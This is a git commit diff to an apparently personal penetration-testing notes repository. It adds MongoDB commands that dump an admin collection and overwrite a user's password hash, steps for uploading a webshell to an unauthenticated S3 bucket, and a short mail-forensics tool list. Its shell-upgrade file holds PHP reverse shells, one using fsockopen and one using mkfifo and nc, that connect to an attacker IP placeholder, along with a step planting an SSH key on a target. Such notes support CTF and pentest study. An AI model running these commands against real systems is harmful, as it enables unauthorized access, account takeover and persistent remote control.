added MongoDB specifics

2022-12-09 00:00:02 +01:00 · 2022-12-09 00:00:02 +01:00 · 451631aefb
parent f0c8c158b4
commit 451631aefb
5 changed files with 77 additions and 0 deletions
--- a/Exploits/Databases/MongoDB.md
+++ b/Exploits/Databases/MongoDB.md
@ -0,0 +1,21 @@
 # MongoDB
 * The cli tool is `mongo`
 * [List Databases of the DBMS](https://www.mongodb.com/docs/manual/reference/command/listDatabases/)
 ## List users
 ```sh
 mongo --port <port> <database_name> --eval "db.admin.find().forEach(printjson);"
 ```
 ## Update User Password
 * Generate new password via
 ```sh
 mkpasswd -m <hash_algo> SecretPassword123
 ```
 * Use the generated password to update a user
 ```sh
 mongo --port <port> <database_name> --eval 'db.admin.update({"_id": ObjectID("4711")},{$set:{"x_shadow":"<generated_hash>"}})'
 ```
--- a/Exploits/Databases/NoSQL
+++ b/Exploits/Databases/NoSQL
@ -4,12 +4,14 @@
 * Examples are Elasticsearch, MongoDB, Redis, CouchDB.
 ## Querying
 * Filter instead of SQL queries
 * [Redis docs](https://redis.io/documentation)
 * [MongoDB operators](https://docs.mongodb.com/manual/reference/operator/query/)
 * [Elasticsearch docs](https://www.elastic.co/guide/index.html)
 ## Operators
 * A precondition to the injection is to know the most common operators listed below
 ```sql
 $and
--- a/Exploits/Databases/S3.md
+++ b/Exploits/Databases/S3.md
@ -0,0 +1,25 @@
 # AWS S3 Buckets
 * `awscli` is the official tool
 ## Configuration
 * An S3 bucket may not be configured to authenticte. Therefore the tool is configured with random credentials via `aws configure`
 * List the endpoint via
 ```sh
 aws --endpoint=http://s3.example.com s3 ls
 2022-12-08 21:06:33 example.com
 ```
 * List the top level domain afterwards
 ```sh
 aws --endpoint=http://s3.example.com s3 ls s3://example.com
 2022-12-08 21:06:33          0 .htaccess
 2022-12-08 21:06:33      1218 index.html
 ```
 * Upload a (webshell) and execute
 ```sh
 aws --endpoint=http://s3.example.com s3 cp monkey.php s3://example.com
 ```
--- a/Forensics/Mail.md
+++ b/Forensics/Mail.md
@ -0,0 +1,16 @@
 # Mail Analysis and Forensics
 ## Tools
 ```sh
 emlAnalyzer
 ```
 ## References
 * [Email reputation](https://emailrep.io)
 * [Virustotal](https://virustotal.com)
 * [Inquest](https://labs.inquest.net)
 * [IPinfo](https://ipinfo.io)
 * [URLscan](https://urlscan.io)
 * [Talos](https://talosintelligence.com)
--- a/Shells/Upgrade
+++ b/Shells/Upgrade
@ -5,7 +5,9 @@
 * [ropnop](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/)
 ## Via interpreter
 ### PHP
 * reverse shell
 ```php
 php -r '$sock=fsockopen("<attacker-IP>", <attacker-Port>);exec("/bin/sh -i <&3 >&3 2>&3");'
@ -19,21 +21,29 @@ php -e 'exec "/bin/bash";'
 ```
 ### Python 
 ```python
 python -c 'import pty; pty.spawn("/bin/bash")'
 ```
 ### Perl
 ```perl
 perl -e 'exec "/bin/sh";'
 ```
 ### Script
 ```sh
 /usr/bin/script -qc /bin/bash /dev/null
 ```
 or 
 ```sh
 script /dev/null -c bash
 ```
 ## Next
 1. `ctrl` + `z`
 2. `stty echo -raw`
 3. `fg`
@ -41,12 +51,15 @@ perl -e 'exec "/bin/sh";'
 5. `export TERM=xterm`
 ## Via SSH
 * `ssh-keygen`
 * copy priv key and `chmod 600`
 * `cat id_rsa.pub > authorized_keys` on target
 ## As Code
 ### PHP
 ```sh
 <?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker-IP> <attacker-PORT> > /tmp/f') ?>
 ```